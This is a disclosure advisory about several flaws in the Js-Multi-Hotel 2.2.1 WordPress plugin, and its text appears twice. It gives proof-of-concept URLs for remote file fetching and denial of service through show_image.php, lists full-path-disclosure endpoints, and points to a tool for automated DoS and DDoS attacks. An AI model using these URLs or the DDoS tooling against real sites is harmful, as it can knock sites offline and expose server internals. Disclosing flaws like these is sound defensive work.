JS-MULTI-HOTEL 2.2.1 XSS / DOS / DISCLOSURE / ABUSE WORDPRESS
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress.
Earlier I wrote about two other vulnerabilities
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for
WordPress. There are much more vulnerabilities in this plugin (including
dangerous holes), so after two advisories I'll write new advisories.
Affected products:
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
Affected vendors:
Joomlaskin
http://www.joomlaskin.it
Details:
Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1
DoS (WASC-10):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1
Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
DDoS attacks via other sites execution tool:
http://websecurity.com.ua/davoset/
Cross-Site Scripting (WASC-08):
other : [ added by khalil shreateh ]
Full path disclosure (WASC-13):
http://site/wp-content/plugins/js-multihotel/includes/functions.php
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
http://site/wp-content/plugins/js-multihotel/includes/widget.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
Read more...
Earlier I wrote about two other vulnerabilities
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for
WordPress. There are much more vulnerabilities in this plugin (including
dangerous holes), so after two advisories I'll write new advisories.
Affected products:
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
Affected vendors:
Joomlaskin
http://www.joomlaskin.it
Details:
Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1
DoS (WASC-10):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1
Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
DDoS attacks via other sites execution tool:
http://websecurity.com.ua/davoset/
Cross-Site Scripting (WASC-08):
other : [ added by khalil shreateh ]
Full path disclosure (WASC-13):
http://site/wp-content/plugins/js-multihotel/includes/functions.php
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
http://site/wp-content/plugins/js-multihotel/includes/widget.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
